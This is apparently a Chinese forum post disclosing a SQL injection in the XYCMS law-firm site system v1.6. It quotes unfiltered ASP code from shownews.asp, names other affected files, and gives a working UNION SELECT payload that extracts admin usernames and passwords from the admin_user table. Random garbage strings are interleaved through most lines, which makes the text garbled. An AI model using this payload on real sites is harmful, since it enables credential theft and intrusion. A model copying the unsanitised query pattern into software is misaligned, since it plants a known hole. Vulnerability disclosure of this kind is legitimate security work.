前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
- [4 S8 \. V+ v- A
1 S9 C. Y6 f- J淫荡分割线
- D0 _1 m4 [9 f7 W--------------------------------------------------------
3 q/ x! R- Q8 g7 g) ~! W$ a7 Q! z
7 Z% L, P8 B9 ?* O" ]审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测), c4 u9 K4 Y' O# ^
源码地址:http://down.chinaz.com/soft/29233.htm7 C" `# z+ {2 o1 ^8 g
4 y9 b( A( ^# R1 \* ^
漏洞文件:shownews.asp/ d- Q6 |6 Z7 x0 ?4 s* e
漏洞代码:7-13行
5 ^0 l4 _& b) q) C* c
; \8 E5 W4 f& F1 o8 g ! x* G; s+ Y" M
<%
( \. v) ]1 t7 `( Wid=request.QueryString("id"), ~7 w; P5 V! {
. V8 L, u6 T9 J; [ ?1 Dset snews=server.createobject("adodb.recordset") , c+ j4 Z: h% G
exec="select * from [news] where id="&id
2 e* b6 C' W j7 ]( Csnews.open exec,conn,1,1
+ S% f% u, m O) F- w3 F%>
- v5 h6 y h6 U7 `1 {% d 3 r5 N; ?8 q9 J ^% b, m f
. J$ h `2 F7 s0 F) ]0 A
什么过滤都没有 直造成注入- k& z' N$ [5 }$ P
5 |" Q5 B* m3 p4 H& z1 C9 Y
注入点:http://127.0.0.1:99/shownews.asp?id=xx5 J: {' _7 f' D. _
+ y" r; K: e) d& g* O
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找* S- [0 ]0 V6 W2 e$ r- b
5 @" T, B0 K/ I + T9 ]4 @: J- U& L. A7 c% L
exp: union select 1,admin,password,4,5,7 from admin_user- u, i+ T0 D$ @% o; J: N
8 v3 F; p& p8 k
|